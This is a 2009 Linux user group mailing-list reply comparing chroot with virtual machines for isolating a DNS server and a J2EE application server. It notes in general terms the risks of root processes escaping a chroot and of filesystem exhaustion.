On Tue, Jul 28, 2009 at 11:56:52AM +0100, James Courtier-Dutton wrote: > All I wish to run is a DNS bind server and an Apache J2EE application server. > What real benefits will a virtual machine have over a chroot environment. > I am on the side that says that chroot should be good enough. > chroot makes much more effective use of filespace between multiple > chroot environments.
As long as neither application is running as root, a chroot should be sufficient. However, once you have something running as root inside a chroot, it's trivial for it to break out of the chroot. (I forget the exact mechanism, but I think it's about two commands to do it, and is expected and designed behaviour). You will also need to place limits on filesystem usage for the chroot users (quotas, or a separate filesystem for the chroot), as if they're cracked, the attacker could DoS by filling up the filesystem. Finally, if you use a chroot, you're still vulnerable to a combination of remote exploit to get into the chroot in the first place, and then a local root exploit to get out of it into the main system. None of the above issues applies (so much) to a VM environment. Hugo. -- === Hugo Mills: h...@... carfax.org.uk | darksatanic.net | lug.org.uk === PGP key: 515C238D from wwwkeys.eu.pgp.net or http://www.carfax.org.uk --- Great oxymorons of the world, no. 8: The Latest --- In Proven Technology
signature.asc
Description: Digital signature
-- Please post to: Hampshire@mailman.lug.org.uk Web Interface: https://mailman.lug.org.uk/mailman/listinfo/hampshire LUG URL: http://www.hantslug.org.uk --------------------------------------------------------------
